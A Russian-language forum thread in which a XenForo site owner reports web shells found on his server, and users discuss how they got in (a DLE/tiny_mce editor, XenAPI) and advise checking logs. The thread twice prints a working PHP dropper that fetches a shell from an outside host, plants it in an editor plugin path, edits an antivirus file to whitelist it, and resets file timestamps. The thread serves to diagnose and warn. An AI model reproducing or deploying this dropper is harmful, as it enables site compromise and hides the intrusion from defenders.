XF 1.5 Обнаружен шелл

[water-lord]

Всем привет, на той недели написал мне мой провайдер, прислал абузу на вредоносную сетевую активность, я предоставил им доступ, просканили, и нашли вот такие файлы -

У Вас недостаточно прав для просмотра ссылок. Вход или Регистрация

У Вас недостаточно прав для просмотра ссылок. Вход или Регистрация

Все плагины, всё качаю только отсюда, я даже не знаю откуда они могли взяться.
Скидываю их Вам, может чем-то поможет, и проверьтесь все на наличие шеллов.

 

[water-lord]

$url_shell = file_get_contents('http://gold-click.info/fr199.txt\'); $shell = 'engine/editor/jscripts/tiny_mce/plugins/spellchecker/xml.php'; $fp = fopen("$shell", "w"); if(fwrite($fp, $url_shell)){ echo "Shell is upload \n"; } else { echo "Problem upload \n"; } fclose($fp);


//обход AV $antivir = 'engine/ajax/antivirus.php'; $time_create = filemtime($antivir);
if (stripos(file_get_contents($antivir), "engine/editor/jscripts/tiny_mce/plugins/spellchecker/xml.php")!==false){ echo "Code AV is already \n"; } else { $text=file_get_contents($antivir); $file = fopen($antivir, 'w');
$text = str_replace('"./engine/editor/jscripts/tiny_mce/plugins/spellchecker/config.php",', '"./engine/editor/jscripts/tiny_mce/plugins/spellchecker/config.php", "./engine/editor/jscripts/tiny_mce/plugins/spellchecker/xml.php",', $text); if(fwrite($file, $text)){ echo "AV Write is complete \n"; } else { echo "Problem AV Write \n"; } fclose($file); } if($res=touch ( $antivir , $time_create )){ echo "touch OK \n"; } else { echo "touch Problem\n"; } if (file_exists($shell)) { echo "Shell is complete \n"; } else { echo "Shell problem \n"; } echo "http://".$_SERVER["HTTP_HOST"]."/"."$shell \n"; // end //

Взято с robot.php, всё связано с плагином редактора, что брал тут

 

[Dead Master]

Что именно проверять?
В каком плагене он обнаружен у тебя
А то сейчас начнется истирия у людей :-D

 

[water-lord]

Что именно проверять?
В каком плагене он обнаружен у тебя
А то сейчас начнется истирия у людей :-D

Антивирус нашел следующее вредоносное ПО: forum/banners/robot.php: Win.Trojan.Shell-49 FOUND forum/banners/573644057f0be/mod_system.php: Win.Trojan.Shell-49 FOUND forum/data/robot.php: Win.Trojan.Shell-49 FOUND

Загрузить файлы не смог на сервер, выдаёт ошибку

Произошла ошибка
При загрузке файла возникла проблема.

Desktop.rar

Что именно проверять?
В каком плагене он обнаружен у тебя
А то сейчас начнется истирия у людей :-D

Проверить всё антивирусом, на наличие шеллов. Особенно тем, кто когда ставил XenAPI

 

[Mirovinger]

Приветствую.
Панику не разводите, так как такая проблема только у Вас, иначе это было бы выявлено раньше и не Вами.

$url_shell = file_get_contents('http://gold-click.info/fr199.txt\'); $shell = 'engine/editor/jscripts/tiny_mce/plugins/spellchecker/xml.php'; $fp = fopen("$shell", "w"); if(fwrite($fp, $url_shell)){ echo "Shell is upload \n"; } else { echo "Problem upload \n"; } fclose($fp);


//обход AV $antivir = 'engine/ajax/antivirus.php'; $time_create = filemtime($antivir);
if (stripos(file_get_contents($antivir), "engine/editor/jscripts/tiny_mce/plugins/spellchecker/xml.php")!==false){ echo "Code AV is already \n"; } else { $text=file_get_contents($antivir); $file = fopen($antivir, 'w');
$text = str_replace('"./engine/editor/jscripts/tiny_mce/plugins/spellchecker/config.php",', '"./engine/editor/jscripts/tiny_mce/plugins/spellchecker/config.php", "./engine/editor/jscripts/tiny_mce/plugins/spellchecker/xml.php",', $text); if(fwrite($file, $text)){ echo "AV Write is complete \n"; } else { echo "Problem AV Write \n"; } fclose($file); } if($res=touch ( $antivir , $time_create )){ echo "touch OK \n"; } else { echo "touch Problem\n"; } if (file_exists($shell)) { echo "Shell is complete \n"; } else { echo "Shell problem \n"; } echo "http://".$_SERVER["HTTP_HOST"]."/"."$shell \n"; // end //

Взято с robot.php, всё связано с плагином редактора, что брал тут

Каким редактором, судя по пути, это не редактор XF.

 

[ValeCore]

water-lord, случайно панель не от весты?
А то у них там всплыло кое-что. Могли запросто закинуть это добро через панель.

В любом случае смотри логи. Заебно конечно, но это нужно сделать, иначе так и не узнаешь как тебе закинули.
Шелл кстати самый стремный. Это шелл-фм, хуже только полный рутак. :facepalm:
И да, если у тебя крупный форум, то сам понимаешь, его уже слили, погугли. Если там есть еще сливы, то можно примерно понять откуда растут ноги.

 

[water-lord]

Приветствую.
Панику не разводите, так как такая проблема только у Вас, иначе это было бы выявлено раньше и не Вами.


Каким редактором, судя по пути, это не редактор XF.

Я не говорил что уязвимость в движке Ксенфоро, я сказал что возможно в дополнении, которое меняет редактор

И редактор этот tiny_mce

 

[ValeCore]

Каким редактором, судя по пути, это не редактор XF.

Это DLE

 

[Mirovinger]

Я не говорил что уязвимость в движке Ксенфоро, я сказал что возможно в дополнении, которое меняет редактор

И редактор этот tiny_mce

То что название редактора такое, не говорит что его только в XF используется.
DLE был установлен у Вас?

Это DLE

Да я уже вижу, со смарта не удобно было смотреть.

 

[xaker01]

Вообще можно получить доступ к логам сервера/хостинга.
хочу узнать каким образом залили шелл.

 

[water-lord]

DLE для изменение редактора был установлен, поэтому и создал тему.
На данный момент я рассматриваю 2 варианта залива, либо через инъекцию в XenAPI, но апи были удалены за неделю до того, как появился шелл.
Либо через редактор

 

[Exile]

Либо через редактор

Единственный вариант. В нем постоянно уязвимости находят.

 

[Mirovinger]

DLE для изменение редактора был установлен, поэтому и создал тему.

Да, а Вы устанавливали другую ЦМС, для изменения редактора на форуме?

На данный момент я рассматриваю 2 варианта залива, либо через инъекцию в XenAPI, но апи были удалены за неделю до того, как появился шелл.

Но, сколько помню по Вашим темам, как раз через это и был произведён слив, Вы даже логи обращения показывали.

 

[water-lord]

Да, а Вы устанавливали другую ЦМС, для изменения редактора на форуме?

Но, сколько помню по Вашим темам, как раз через это и был произведён слив, Вы даже логи обращения показывали.

Слив БД и шелл - немного разное. И разница между сливом и шеллом в неделю, как уже написал выше

 

[Mirovinger]

Вы уверены, проверяли форум после слива БД, анализировали логи, как было всё это произведено?